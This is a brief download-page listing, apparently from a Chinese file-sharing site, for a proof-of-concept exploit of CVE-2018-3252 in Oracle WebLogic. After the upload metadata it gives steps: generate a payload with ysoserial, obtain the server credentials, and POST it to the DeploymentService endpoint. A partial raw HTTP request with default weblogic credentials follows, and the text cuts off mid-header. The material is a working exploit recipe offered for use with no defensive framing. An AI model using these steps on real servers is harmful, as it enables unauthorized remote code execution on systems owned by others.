上传者: 42153801
|
上传时间: 2022-11-10 06:44:25
|
文件大小: 586KB
|
文件类型: ZIP
CVE-2018-3252-PoC
1.使用YSOSERIAL生成PoC
2.您应该知道目标weblogic服务器的USERNAME和PASSWORD
3.将有效载荷发送到URL
POST /bea_wls_deployment_internal/DeploymentService HTTP/1.1
Host: 127.0.0.1:7001
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
wl_request_type: data_transfer_request
username: weblogic
password: weblogic
serverName: pyn3rd
deployment_reque